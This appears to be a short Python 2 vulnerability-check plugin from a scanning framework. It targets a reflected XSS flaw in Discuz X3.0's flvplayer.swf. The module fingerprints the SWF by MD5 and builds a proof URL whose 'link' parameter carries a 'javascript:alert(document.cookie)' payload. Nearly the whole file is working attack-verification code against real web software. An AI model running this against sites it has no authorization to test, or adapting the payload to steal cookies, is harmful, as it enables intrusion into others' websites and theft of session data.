#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-09-20 15:34:41
# @Last Modified by:   Lcy
# @Last Modified time: 2016-09-21 10:43:56
import urllib2
import md5
class Exploit:
    def __init__(self,target,expfile):
        self.target = target
        self.result = {
            "name": "discuz X3.0 /static/image/common/flvplayer 反射XSS",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status":False,
            "info":"",
            'filename':expfile+ ".py",
            "target":target,
        }
    def verify(self):
        flash_md5 = "7d675405ff7c94fa899784b7ccae68d3"
        file_path = "/static/image/common/flvplayer.swf"
        try:
            file_url = ("{domain}{path}".format(domain=self.target, path=file_path))
            vurl = file_url + "?file=1.flv&linkfromdisplay=true&link=javascript:alert(document.cookie);"
            req = urllib2.Request(file_url)
            res = urllib2.urlopen(req,timeout=3)
            file_content = res.read()
            md5_value = md5.new(file_content).hexdigest()
            if md5_value in flash_md5:
                self.result['status'] = True
                self.result['info'] = "%s目标存在flash反射型xss,验证地址：%s" % (self.target,vurl)
        except Exception,e :
            pass
       